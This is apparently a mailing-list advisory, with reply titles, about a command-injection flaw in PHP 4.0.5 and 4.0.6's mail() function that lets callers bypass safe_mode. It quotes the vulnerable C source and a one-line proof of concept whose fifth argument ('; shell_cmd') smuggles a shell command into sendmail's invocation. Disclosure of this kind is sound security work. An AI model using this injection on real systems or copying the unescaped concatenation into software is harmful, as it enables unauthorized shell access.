php mail() function does not do check for escape shell commandes,
even if php is running in safe_mode.
So it's may be possible to bypass the safe_mode restriction and gain
shell access.
Affected:
php4.0.6
php4.0.5
Significatives lines of ext/standard/mail.c:
>extra_cmd = (*argv[4])->value.str.val;
>strcat (sendmail_cmd, extra_cmd);
>sendmail = popen(sendmail_cmd, "w");
Exploit:
mail("[EMAIL PROTECTED]",
"test",
"test",
"test",
"; shell_cmd");
- Re: php mail function bypass safe_mode restriction Laurent Sintes
- Re: php mail function bypass safe_mode restriction Salim Gasmi
- Re: php mail function bypass safe_mode restriction Laurent Sintes
- Re: php mail function bypass safe_mode restriction Laurent Sintes
- Re: php mail function bypass safe_mode restriction Stuart Moore
